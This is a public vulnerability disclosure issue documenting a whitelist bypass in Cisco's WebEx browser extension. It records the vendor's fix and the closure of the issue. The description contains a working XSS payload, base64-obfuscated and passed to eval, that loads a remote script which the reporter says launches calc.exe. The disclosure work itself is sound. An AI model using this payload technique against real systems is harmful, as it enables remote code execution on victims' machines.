New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
This site will be read-only for 3-4 hours starting at Sunday, 08:00AM PDT
Starred by 2 users

Issue metadata

Status: Fixed
Closed: Jan 2017

Blocked on:
issue 1324

issue 1096

Sign in to add a comment

Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass

Project Member Reported by, Jan 25 2017 Back to list

Issue description

In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing  issue 1096 .

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *, but they're unfortunately not difficult to find.

Here is a working example:");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script:

Please note, that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Windows 10-2017-01-24-19-23-30.png
822 KB View Download
Project Member

Comment 1 by, Jan 25 2017

Project Member

Comment 2 by, Jan 25 2017

Project Member

Comment 3 by, Jan 25 2017

I made some minor changes to the exploit script.
7.1 KB View Download
Project Member

Comment 4 by, Jan 26 2017


Hi Tavis,
We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.


Project Member

Comment 5 by, Jan 26 2017

Labels: -Restrict-View-Commit
Status: Fixed
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco, I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).
Project Member

Comment 6 by, Jan 26 2017

Cisco's advisory is here

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member

Comment 7 by, Feb 3 2017

Labels: -Reported-2017-01-24 Reported-2017-Jan-24

Comment 8 Deleted

Comment 9 Deleted

Comment 10 Deleted

Project Member

Comment 11 by, Jul 6 2017

Blockedon: 1324

Sign in to add a comment